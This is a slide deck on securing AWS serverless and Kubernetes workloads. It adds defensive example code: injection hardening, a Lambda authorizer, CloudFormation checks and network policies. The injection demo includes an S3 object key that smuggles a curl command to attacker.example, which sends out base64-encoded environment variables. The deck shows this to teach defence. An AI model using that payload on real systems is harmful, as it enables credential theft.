
Securing Serverless and Container Services, Marc Schröter (AWS DevOps Engineer @ globaldatanet), slide deck



  1. Securing Serverless and Container Services Marc Schröter AWS DevOps Engineer @ globaldatanet Community Day 2019 Sponsors

  2. globaldatanet: Serverless; DevOps Automation; Continuous Delivery; Highly scalable and fault-tolerant solutions; Infrastructure as Code; Cloud Security and Compliance Controls; Container Security and managing the full container life cycle

  3. What is serverless, and how does it impact your approach to security?

  4. What is serverless? Shift operational responsibilities to AWS Increasing your agility and innovation

  5. No infrastructure provisioning, no management; Automatic scaling; Pay for value; Highly available and secure

  6. Serverless building blocks on AWS. COMPUTE: AWS Lambda, AWS Fargate. DATA STORES: Amazon S3, Amazon Aurora Serverless, Amazon DynamoDB. INTEGRATION: Amazon API Gateway, Amazon SQS, Amazon SNS, AWS Step Functions

  7. Serverless Risks - OWASP A1: Injection A2: Broken Authentication A3: Sensitive Data Exposure A4: XML External Entities (XXE) A5: Broken Access Control A6: Security Misconfiguration A7: Cross-Site Scripting (XSS) A8: Insecure Deserialization A9: Using Components with Known Vulnerabilities A10: Insufficient Logging and Monitoring

  8. Serverless Risks - CSA SAS-1: Function Event Data Injection SAS-2: Broken Authentication SAS-3: Insecure Serverless Deployment Configuration SAS-4: Over-Privileged Function Permissions & Roles SAS-5: Inadequate Function Monitoring and Logging SAS-6: Insecure Third-Party Dependencies SAS-7: Insecure Application Secrets Storage SAS-8: Denial of Service & Financial Resource Exhaustion SAS-9: Serverless Business Logic Manipulation SAS-10: Improper Exception Handling and Verbose Error Messages SAS-11: Obsolete Functions, Cloud Resources and Event Triggers SAS-12: Cross-Execution Data Persistency

  9. Serverless Risk Categorization
     Application Code & App Logic Risks: Injection; Broken Authentication; Sensitive data exposure; XSS, XXE; Insecure deserialization; Known vulnerabilities; Improper exception handling
     Deployment Configuration Risks: Security misconfiguration; Overprivileged permissions; Insecure secrets storage
     Serverless Platform Risks: Broken access control; Inadequate monitoring
     Misc. Risks: DoS; Unused functions; Data persistency

  10. A1: Injection

  11. Injection

  12. Injection ● Use a Web Application Firewall ● Validate data against schemas and data transfer objects ● Use an ORM or parameterized queries instead of string-built queries ● Escape special characters ● Use least privilege ● Consider all event types and entry points into the system (S3, SQS, SNS and CloudWatch events carry attacker-influenced data just like HTTP requests) ● Use a commercial runtime defense solution
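The "consider all event types" point deserves a concrete shape. The following is an added example, not code from the talk: a Lambda that processes an image whose key arrives in an S3 event record, first in the vulnerable form (key spliced into a shell string) and then hardened (key allow-listed, command passed as an argument list). The event records are constructed to look like `Records[0]` of a real S3 notification; the function name and the `convert` invocation are assumptions for the demo. The vulnerable variant returns the command string instead of running it so the example is safe to execute.

```python
"""Function event data injection (CSA SAS-1 / OWASP A1) in a Lambda handler:
vulnerable vs. hardened. Added example, not from the original talk."""
import re
from urllib.parse import unquote_plus

# Constructed S3 event records (shape of a real S3 notification, trimmed).
BENIGN_EVENT = {"Records": [{"s3": {"object": {"key": "uploads/cat.png"}}}]}
MALICIOUS_EVENT = {"Records": [{"s3": {"object": {
    # An attacker controls the key by choosing the upload file name.
    "key": "x.png; curl http://attacker.example/$(env | base64) #"}}}]}

# Allow-list: one directory, a short safe file name, two extensions.
SAFE_KEY = re.compile(r"^uploads/[A-Za-z0-9_-]{1,64}\.(png|jpe?g)$")


def build_command_unsafe(event):
    """Vulnerable: the key is interpolated into a shell command line.

    Run through subprocess with shell=True, everything after ';' executes as
    a second command, with the function's environment (and its temporary
    credentials) readable by it. Returned, not executed, for the demo.
    """
    key = event["Records"][0]["s3"]["object"]["key"]
    return f"convert /tmp/{key} -resize 50% /tmp/out.png"  # would be shell=True


def build_command_safe(event):
    """Hardened: decode, allow-list, then pass the key as one argv element.

    S3 URL-encodes keys in event records, so decode before validating.
    With an argument list (subprocess.run(argv), no shell) the key is a
    single argument; shell metacharacters have no meaning there, and the
    regex rejects traversal ('..') and junk before we ever get that far.
    """
    key = unquote_plus(event["Records"][0]["s3"]["object"]["key"])
    if not SAFE_KEY.match(key):
        raise ValueError(f"rejected object key: {key!r}")
    return ["convert", f"/tmp/{key}", "-resize", "50%", "/tmp/out.png"]
```

Pair the allow-list with the least-privilege point on slide 19: even if a payload got through, a role limited to `s3:GetObject` on one bucket leaves little worth exfiltrating from the environment.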

  13. A2: Broken Authentication

  14. Broken Authentication ● AWS Cognito or Single Sign-On ● API Gateway access control ○ API keys ○ Usage plans ○ AWS IAM roles and policies ○ Amazon Cognito user pools ○ Lambda authorizer functions ● Service authentication between internal resources ○ SAML, OAuth2, security tokens ○ Encrypted channels ○ Password and key management ○ Client certificates ○ OTP/2FA
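Of the API Gateway options listed, the Lambda authorizer is the one you write yourself, so it is the one that gets broken. Below is an added example (not from the talk) of a TOKEN-type authorizer: it verifies an HMAC-SHA256-signed bearer token with a constant-time comparison and an expiry check, then returns the policy document API Gateway expects. The token format (base64url JSON payload, a dot, hex tag) and the in-code signing key are assumptions for the demo; a real function would load the key from Secrets Manager or SSM Parameter Store.

```python
"""API Gateway Lambda authorizer (TOKEN type) verifying an HMAC-signed token.
Added example, not from the original talk."""
import base64
import hashlib
import hmac
import json
import time

SIGNING_KEY = b"example-key-load-from-secrets-manager"  # assumption for the demo


def issue_token(subject, ttl_seconds=300, now=None):
    """Mint a token: base64url(JSON claims) + '.' + hex(HMAC-SHA256)."""
    now = int(time.time()) if now is None else now
    claims = json.dumps({"sub": subject, "exp": now + ttl_seconds}).encode()
    payload = base64.urlsafe_b64encode(claims).decode()
    tag = hmac.new(SIGNING_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_token(token, now=None):
    """Return the claims of a valid, unexpired token, otherwise None."""
    now = int(time.time()) if now is None else now
    try:
        payload, tag = token.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SIGNING_KEY, payload.encode(), hashlib.sha256).hexdigest()
    # compare_digest: a plain '==' short-circuits and leaks the tag byte by byte.
    if not hmac.compare_digest(expected, tag):
        return None
    try:
        claims = json.loads(base64.urlsafe_b64decode(payload))
    except ValueError:  # bad base64 or bad JSON
        return None
    if not isinstance(claims, dict) or claims.get("exp", 0) <= now:
        return None
    return claims


def policy(principal_id, effect, method_arn):
    """The response shape API Gateway requires from a TOKEN authorizer."""
    return {
        "principalId": principal_id,
        "policyDocument": {
            "Version": "2012-10-17",
            "Statement": [{"Action": "execute-api:Invoke",
                           "Effect": effect,
                           "Resource": method_arn}],
        },
    }


def handler(event, context=None):
    """Lambda entry point; event['authorizationToken'] is 'Bearer <token>'."""
    scheme, _, token = event.get("authorizationToken", "").partition(" ")
    if scheme.lower() != "bearer" or not token:
        raise Exception("Unauthorized")  # API Gateway turns this into HTTP 401
    claims = verify_token(token)
    if claims is None:
        # Explicit Deny (HTTP 403); say nothing about why to the caller.
        return policy("anonymous", "Deny", event["methodArn"])
    return policy(claims["sub"], "Allow", event["methodArn"])
```

Two details matter in practice: scope `Resource` to the method ARN (or a narrower set of ARNs) rather than `*`, because API Gateway caches the returned policy per token and reuses it for every route it covers, and keep the authorizer result TTL short enough that expiry in the token actually means something.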

  15. A3: Sensitive Data Exposure

  16. Sensitive Data Exposure ● Identify and classify sensitive data ● Minimize storage of sensitive data ● Protect data at rest and in transit ● Use HTTPS only endpoints for APIs ● Key management ● Encryption of stored data ● Secret Management ● Environment variables encryption

  17. A5: Broken Access Control

  18. Broken Access Control: fine-grained access control (diagram: Amazon API Gateway routes POST to the customers table, GET to the orders table and DELETE to a queue, each integration with its own permissions)

  19. Broken Access Control Follow least-privilege

  20. Broken Access Control Automate permission configuration

  21. Broken Access Control Automate permission configuration

  22. Broken Access Control: automate security testing of IaC (diagram: a CloudFormation stack CREATE/UPDATE emits a CloudWatch event; a Lambda function pulls the CF script from S3 and tests it; SES notifies on failure)

  23. Broken Access Control Analyze IAM access patterns programmatically

  24. Broken Access Control Analyze IAM access patterns programmatically

  25. Broken Access Control Follow AWS IAM Best Practices

  26. A6: Security Misconfiguration

  27. Security Misconfiguration ● Enforce access control ● Follow the provider's security best practices ● Check for functions with unlinked triggers ● Check for resources that appear in policies but are not linked back to the function ● Set timeouts to the minimum the function needs ● Use automated tools that detect security misconfigurations
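Slides 19 to 27 all come down to checks that can run automatically against the template before the stack is created or updated, which is what the Lambda on slide 22 does. The following is an added example, not the speaker's code: three static checks over a CloudFormation template held as a Python dict (the JSON form), flagging wildcard `Action`/`Resource` in role policies (slide 19), secret-looking environment variables given as literal strings rather than Secrets Manager dynamic references (slide 16), and timeouts above a threshold (slide 27). The sample template, the 60-second limit and the secret-name regex are assumptions.

```python
"""Static IaC checks for a CloudFormation template: over-privileged roles,
plaintext secrets in Lambda env vars, over-long timeouts.
Added example, not from the original talk."""
import re

SECRET_NAME = re.compile(r"SECRET|PASSW(OR)?D|TOKEN|API_?KEY|PRIVATE_?KEY", re.I)
MAX_TIMEOUT = 60  # seconds; assumption, tune per function

# Constructed template: one over-privileged role/function, one sane pair.
TEMPLATE = {"Resources": {
    "BadRole": {"Type": "AWS::IAM::Role", "Properties": {"Policies": [
        {"PolicyName": "all", "PolicyDocument": {"Statement": [
            {"Effect": "Allow", "Action": "*", "Resource": "*"}]}}]}},
    "GoodRole": {"Type": "AWS::IAM::Role", "Properties": {"Policies": [
        {"PolicyName": "orders-read", "PolicyDocument": {"Statement": [
            {"Effect": "Allow",
             "Action": ["dynamodb:GetItem", "dynamodb:Query"],
             "Resource": "arn:aws:dynamodb:eu-central-1:123456789012:table/orders"}]}}]}},
    "BadFunction": {"Type": "AWS::Lambda::Function", "Properties": {
        "Role": {"Fn::GetAtt": ["BadRole", "Arn"]}, "Timeout": 900,
        "Environment": {"Variables": {"DB_PASSWORD": "hunter2", "TABLE": "orders"}}}},
    "GoodFunction": {"Type": "AWS::Lambda::Function", "Properties": {
        "Role": {"Fn::GetAtt": ["GoodRole", "Arn"]}, "Timeout": 10,
        "Environment": {"Variables": {
            # Dynamic reference: resolved at deploy time, never stored in the template.
            "DB_PASSWORD": "{{resolve:secretsmanager:prod/db:SecretString:password}}",
            "TABLE": "orders"}}}},
}}


def _as_list(x):
    """IAM allows a string or a list in Action/Resource/Statement."""
    return x if isinstance(x, list) else [x]


def check_iam_roles(template):
    """Flag Allow statements with '*' or 'service:*' actions or '*' resources."""
    findings = []
    for name, res in template["Resources"].items():
        if res["Type"] != "AWS::IAM::Role":
            continue
        for pol in res["Properties"].get("Policies", []):
            for stmt in _as_list(pol["PolicyDocument"]["Statement"]):
                if stmt.get("Effect") != "Allow":
                    continue
                actions = _as_list(stmt.get("Action", []))
                if any(a == "*" or a.endswith(":*") for a in actions):
                    findings.append((name, f"wildcard action in {pol['PolicyName']}: {actions}"))
                if "*" in _as_list(stmt.get("Resource", [])):
                    findings.append((name, f"wildcard resource in {pol['PolicyName']}"))
    return findings


def check_lambda_functions(template):
    """Flag literal secret-looking env vars and timeouts above MAX_TIMEOUT."""
    findings = []
    for name, res in template["Resources"].items():
        if res["Type"] != "AWS::Lambda::Function":
            continue
        props = res["Properties"]
        for var, value in props.get("Environment", {}).get("Variables", {}).items():
            # A literal string sits in the template, the stack and the console.
            # Intrinsics (dicts) and {{resolve:...}} references are acceptable.
            if (SECRET_NAME.search(var) and isinstance(value, str)
                    and not value.startswith("{{resolve:")):
                findings.append((name, f"plaintext secret in env var {var}"))
        timeout = props.get("Timeout", 3)  # CloudFormation default is 3 s
        if isinstance(timeout, int) and timeout > MAX_TIMEOUT:
            findings.append((name, f"timeout {timeout}s exceeds {MAX_TIMEOUT}s"))
    return findings


def check_template(template):
    """Run every check; an empty list means the template passed."""
    return check_iam_roles(template) + check_lambda_functions(template)
```

Wire `check_template` to the stack event from slide 22 and fail the notification on a non-empty result. The same wildcard check is worth running against deployed roles as well: CloudTrail-backed access analysis (slides 23 and 24) tells you which of the granted actions are actually used, which is the input for tightening them.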

  28. A9: Using Components with Known Vulnerabilities

  29. Known Vulnerabilities ● Continuously monitor dependencies and their versions ● Only obtain components from official sources ● Continuously monitor sources like CVE and NVD ● Platform advisories such as Node Security, PyUp, OWASP SafeNuGet, etc. ● Scan dependencies for known vulnerabilities ○ OWASP Dependency-Check ○ GitHub Security Alerts ○ GitLab Dependency Scanning ○ WhiteSource

  30. Serverless Security Demo

  31. Serverless Security Demo 1. Information Gathering 2. Function Reverse Engineering 3. Digging For Gold Inside Environment Variables 4. Exploiting Over-Privileged IAM Roles 5. Abusing Insecure Cloud Configurations 6. Finding Known Vulnerabilities In Open Source Packages

  32. Security for Amazon Kubernetes Cluster

  33. Encrypt communication ● Between web clients and your load balancer ○ Use the Application Load Balancer (ALB) ○ Can be achieved with the ALB Ingress Controller ○ ALB provides routing and security options at the application layer ● Between your load balancer and your pods ○ Encryption support in your application or application server ○ Run a sidecar in your pod that performs the encryption ○ Run a complete service mesh like Istio ● Between your pods and your AWS RDS database
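The first two hops on this slide can be expressed in the Ingress object itself. The manifest below is an added example, not from the talk, for the ALB Ingress Controller: the ALB listens on 443 only with an ACM certificate and a TLS 1.2 policy, and forwards to the pods over HTTPS, which only works if the pod (or a sidecar in it) terminates TLS on the backend port. Namespace, host, service name, port and the certificate ARN are placeholders.

```yaml
# Added example (not from the talk): TLS on both hops, client -> ALB and ALB -> pod.
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: orders-api
  namespace: shop                       # assumed
  annotations:
    kubernetes.io/ingress.class: alb
    alb.ingress.kubernetes.io/scheme: internet-facing
    alb.ingress.kubernetes.io/target-type: ip
    # Only an HTTPS listener; no plaintext :80 listener is created at all.
    alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS": 443}]'
    alb.ingress.kubernetes.io/certificate-arn: arn:aws:acm:eu-central-1:123456789012:certificate/REPLACE-ME
    alb.ingress.kubernetes.io/ssl-policy: ELBSecurityPolicy-TLS-1-2-2017-01
    # Second hop: the ALB speaks TLS to the pod, so the pod must serve TLS itself.
    alb.ingress.kubernetes.io/backend-protocol: HTTPS
spec:
  rules:
    - host: orders.example.com          # assumed
      http:
        paths:
          - path: /*
            backend:
              serviceName: orders       # assumed; serves TLS on 8443
              servicePort: 8443
```

With `target-type: ip` the ALB talks to pod IPs directly, so any NetworkPolicy on the pods (slide 35) must admit the load balancer's subnets.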

  34. Encrypt storage ● Databases ● Persistent Volume Claims (PVC)

  35. Restrict inbound and outbound traffic ● Use network policies (without one, every pod can talk to every other pod) ● Network policy engine (Calico)
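Kubernetes applies no restriction until some NetworkPolicy selects a pod, so the usual pattern is a default-deny for the namespace followed by explicit allows. The manifests below are an added example, not from the talk, for an orders service behind an ALB that needs only its database and DNS. The namespace, labels and CIDRs (ALB subnets, RDS subnet) are assumptions; Calico, as on the slide, enforces them on EKS.

```yaml
# Added example (not from the talk). Namespace, labels and CIDRs are assumed.
# 1) Default deny for every pod in the namespace, both directions.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: shop
spec:
  podSelector: {}                 # empty selector = all pods in the namespace
  policyTypes: [Ingress, Egress]  # no rules listed, so nothing is allowed
---
# 2) Allow exactly what the orders pods need.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: orders-allow
  namespace: shop
spec:
  podSelector:
    matchLabels:
      app: orders
  policyTypes: [Ingress, Egress]
  ingress:
    - from:
        - ipBlock:
            cidr: 10.10.0.0/23    # ALB subnets (assumed); ALB -> pod on the TLS port
      ports:
        - protocol: TCP
          port: 8443
  egress:
    - to:
        - ipBlock:
            cidr: 10.20.0.0/24    # RDS subnet (assumed); PostgreSQL over TLS
      ports:
        - protocol: TCP
          port: 5432
    - to:                         # DNS, otherwise the RDS endpoint cannot be resolved
        - namespaceSelector: {}
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
```

The egress rule is what turns a compromised pod from a beachhead into a dead end: no route to the metadata service, the rest of the cluster or the internet unless it is listed here.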

  36. More EKS Security Tips ● Use a firewall to block known web attacks ● Protect yourself from DDoS attacks ● Secure your AWS account ● Use namespaces and secrets ● Cyber attack detection ● Review your security setup ● Scan your container images ○ Aqua Security Microscanner ○ CoreOS Clair ○ Anchore Engine

  37. Container DevSecOps

  38. Container DevSecOps pipeline (diagram):
     1. A developer in AWS Cloud9 opens a pull request in AWS CodeCommit (application repo).
     2. An Amazon CloudWatch event rule triggers AWS CodePipeline.
        Stages, each run in AWS CodeBuild: PULL REQUEST → DOCKER LINTING → SECRETS SCANNING → VULNERABILITY SCANNING → PUBLISH IMAGE (configs in the development repo).
     3. Vulnerability findings are pushed to AWS Security Hub.
     4. The image is built and pushed to Amazon ECR.
     5. CodeBuild success/failure triggers a CloudWatch event rule.
     6. The rule triggers an AWS Lambda function.
     7. The Lambda function adds the result as feedback to the pull request.

  39. Build with services, not servers. Ahhhh, and we are hiring. globaldatanet: mail@globaldatanet.com, globaldatanet.com
